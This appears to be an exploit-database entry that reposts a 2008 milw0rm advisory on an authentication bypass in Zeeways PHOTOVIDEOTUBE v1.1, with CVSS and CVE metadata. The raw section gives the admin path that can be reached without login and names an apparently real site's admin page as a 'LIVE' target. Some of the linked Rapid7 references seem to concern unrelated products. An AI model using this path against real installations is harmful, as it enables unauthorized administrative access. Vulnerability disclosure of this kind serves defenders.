header-logo
Suggest Exploit
vendor:
PHOTOVIDEOTUBE
by:
Mountassif Moad
7.5
CVSS
HIGH
Auth Bypass
287
CWE
Product Name: PHOTOVIDEOTUBE
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: CVE-2008-5183
CPE: a:zeeways:photovideotube:1.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-cups-cve-2008-5183/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-5183/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-1029/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-5183/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Zeeways PHOTOVIDEOTUBE v1.1 Auth Bypass Vulnerability

Zeeways PHOTOVIDEOTUBE v1.1 is prone to an authentication-bypass vulnerability because it fails to properly authenticate users. An attacker can exploit this issue to gain access to the application and perform unauthorized actions.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

==============================================================================
 Zeeways PHOTOVIDEOTUBE v1.1  Auth Bypass Vulnerability
==============================================================================
 [»] Script  :          [ Zeeways PHOTOVIDEOTUBE v1.1  ]
 [»] Language:          [ PHP ]
 [»] Website :          [ http://zeeways.com/php-software/photovideotube-v1.1.html ]
        [»] Discover:          [ Mountassif Moad  ]
===[ XPL ]===
 [»] http://localhost/[path]/admin/home.php

===[ LIVE ]===
 [»] http://www.photovideotube.com/admin//main.php

# milw0rm.com [2008-11-08]

Navigation

Suggest Exploit

Services By CQR